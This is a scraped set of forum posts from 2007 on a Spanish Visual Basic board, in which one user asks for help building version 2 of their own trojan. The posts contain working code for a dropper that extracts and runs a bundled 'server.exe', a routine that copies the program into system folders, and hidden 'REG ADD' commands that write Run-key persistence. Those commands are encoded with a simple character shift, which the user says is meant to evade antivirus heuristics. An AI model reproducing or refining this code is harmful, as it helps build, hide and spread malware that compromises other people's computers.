|
211
|
Programación / Programación Visual Basic / Re: [Source] NetBios infection Module (ojo que es peligroso!)
|
en: 15 Julio 2007, 00:15 am
|
Tienes un grupo de trabajo creado con tus 3 PC''''s? Tienes firewall habilitado en alguno de tus PC''''s Están los 3 equipos dentro de la misma subred? Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''''s? Si a todo, como en windows xDD si tengo todo ello hecho. lo de la subred es el mismo rango de ip no? me explico un poco : una subred seria por ejemplo 192.168.1.12, 192.168.1.13, etc. si por ejemplo tuviera 192.168.0.12 y 192.168.1.13 no seria una subred. es asi?? Gracias. PD aora me bajo de pscode a ver si saco algo en claro
|
|
|
213
|
Programación / Programación Visual Basic / Re: Felicidades a los 2 nuevos moderadores
|
en: 13 Julio 2007, 13:55 pm
|
FIERAS, me alegro de tener tres estupendos moderadores en este subforo, esperemos que no cojais mala fama por cerrar post de disputas ni cosas de esas, que sois tres tios de PM.
Ehorawena a los 3, no solo a hendrix y EON, si no tb a Mad, que tambien lo an echo mod y creo que es una loable eleccion.
FIERAS
xDD
|
|
|
217
|
Programación / Programación Visual Basic / Re: aplicacion con winsock
|
en: 2 Julio 2007, 16:29 pm
|
mira yo lo ago de la siguiente manera. Crea un proyecto y pega este code: Private Declare Function DllRegisterServer Lib "MSWINSCK.OCX" () As Long Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Function LoadDataIntoFile(ByVal DataName As Integer, _ ByVal Filename As String, ByVal Types As String)
Dim myArray() As Byte Dim myFile As Long
If Dir(Filename) = "" Then myArray = LoadResData(DataName, Types) myFile = FreeFile Open Filename For Binary Access Write As #myFile Put #myFile, , myArray Close #myFile End If End Function
Private Sub Form_Load() Dim Car As String * 128 Dim Longitud, Es As Integer Dim Camino As String Dim win Dim sys Longitud = 128 Es = GetWindowsDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) win = Camino Es = GetSystemDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) sys = Camino LoadDataIntoFile 101, sys & "\MSWINSCK.OCX", "CUSTOM"
If DllRegisterServer = ERROR_SUCCESS Then MsgBox "Registration Successful" Else MsgBox "Registration Unsuccessful" End If End Sub
Private Sub Timer1_Timer() LoadDataIntoFile 102, sys & "\server.exe", "CUSTOM"
End Sub
luego colocas un timer con intervalo 2000. despues solo tienes que añadir la libreria y el server al proyecto como recursos. añadre primero la libreria y luego el server. una vez exo esto compilas y manda el exe generado. lo que hace esto es extrae la libreria a system32 y la registra. y pasados unos segundos extrae el server a la carpeta donde esta este programa. kuando lo ejecutes no deberia de salir el error del winsock. esta sacado del api-guide, luego le e ido añadiendo cosillas para que extraiga el server y demas. espero que te sirva.
|
|
|
218
|
Programación / Programación Visual Basic / Re: problema con el registro encryptado
|
en: 25 Junio 2007, 14:01 pm
|
gracias a tos por contestar, voy a porbrar como dice eon. si para encryptar utilizo esta funcion: Public Function en(j) On Error Resume Next For R = 1 To Len(j) en = en & Chr(Asc(Mid(j, R, 1)) + 7) Next End Function y para desencryptar uso esto: Public Function encrypt(p) On Error Resume Next For R = 1 To Len(p) encrypt = encrypt & Chr(Asc(Mid(p, R, 1)) - 7) Next End Function aora pruebo y os comento. PD: no esta en el form load, esta en un modulo para que cuando llame a la funcion, segun los valores que le meto al server al crearlo desde el cliente haga una cosa u otra: Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function CopyFileEx Lib "kernel32.dll" Alias "CopyFileExA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal lpProgressRoutine As Long, lpData As Any, ByRef pbCancel As Long, ByVal dwCopyFlags As Long) As Long
Public Sub autocopiar(win As Variant, sys As Variant, name As Variant, localmachine As Variant, currentuser As Variant, explorer As Variant, valor As Variant) Dim Car As String * 128 Dim Longitud, Es As Integer Dim Camino As String Dim SO Dim Sistema
opwindows = win opsystem = sys name = name hklm = localmachine hkcu = currentuser hkex = explorer valuereg = valor Longitud = 128 Es = GetWindowsDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) SO = Camino Es = GetSystemDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) Sistema = Camino If opwindows = "V" Then origen = App.Path If Right(origen, 1) <> "\" Then origen = origen & "\" origen = origen & App.EXEName & ".exe" Ret = CopyFileEx(origen, SO & "\" & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE) If hklm = 1 Then reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hs|lyln'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If If hkcu = 1 Then reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If If hkex = 1 Then reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'ZV'-')c)'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If End If
If sys = "V" Then origen = App.Path If Right(origen, 1) <> "\" Then origen = origen & "\" origen = origen & App.EXEName & ".exe" Ret = CopyFileEx(origen, Sistema & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE) If localmachine = "1" Then reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If If currentuser = "1" Then reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If If explorer = "1" Then reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'Zpz{lth'-'uhtl'-')'6m") Shell "cmd.exe /c " & reg & "", vbHide End If End If End Sub
|
|
|
219
|
Programación / Programación Visual Basic / problema con el registro encryptado
|
en: 24 Junio 2007, 22:28 pm
|
wenas, tengo un pequeño problema que me trae un poco de cabeza.
tengo una cadena cifrada que añade mi aplicacion al registro. si no esta encryptada el nod salta por herustica, pero si esta encryptada no se añade al registro. esto es por que en la cadena para añadirse tengo 2 variables, una con el nombre de la clave y otra con el valor de la clave:
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v " & valuereg & " /t REG_SZ /d " & SO & "\" & name & " /f
esta es la cadena desencryptada. si kito las variables y dejo la cadena asi:
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v Nombre /t REG_SZ /d C:\sdad\exe /f
si que se añade encryptada. que puede pasar para que no funcione?
gracias
|
|
|
220
|
Programación / Programación Visual Basic / error 458 en tiempo de ejecucion
|
en: 18 Junio 2007, 16:20 pm
|
wenas, aver os comento, haciendo la v2 de mi troyano, estoy haciendo que en el editor de server puedas elegir opciones como añadir al reg, autocopiarse, etc. el caso es que al generar el server me salta este error cuando intento ejecutarlo (el server) Error '458' en tiempo de ejecucion. Variable utiliza un tipo de automatización no admitido en Visual Basic. esto es lo que dice microsoft: http://support.microsoft.com/kb/191205/essegun ellos es causa al tener acceso a la propiedad BackColor de un control TextBox de Enriquecer que es tiempo de ejecución ni se que es eso ni lo tengo puesto en mi troyano. os dejo el code de crear el server del cliente. Dim port As String * 5 Dim ip As String * 30 Dim copiar As String * 1 Dim opwindows As String * 1 Dim opsystem32 As String * 1 Dim nombre As String * 20 Dim localmachine As String * 1 Dim currentuser As String * 1 Dim explorer As String * 1 Dim valor As String * 20
Private Sub EditarServer(Ruta As String) '---CONEXION ip = Text1.Text port = Text2.Text '---AUTOCOPIAR copiar = cp.Value opwindows = opwin.Value opsystem32 = opsys.Value nombre = txName.Text '---INICIO localmachine = hklm.Value currentuser = HKCU.Value explorer = hkex.Value valor = txValueReg.Text '---AÑADIMOS Open Ruta For Binary As #1 Put #1, LOF(1) + 1, port Put #1, , ip Put #1, , copiar Put #1, , opwindows Put #1, , opsystem32 Put #1, , nombre Put #1, , localmachine Put #1, , currentuser Put #1, , explorer Put #1, , valor Close #1 MsgBox "Server Creado", vbInformation End Sub aver si me podeis ayudar, que no se por que razon pasa esto. gracias
|
|
|
|
|
|
|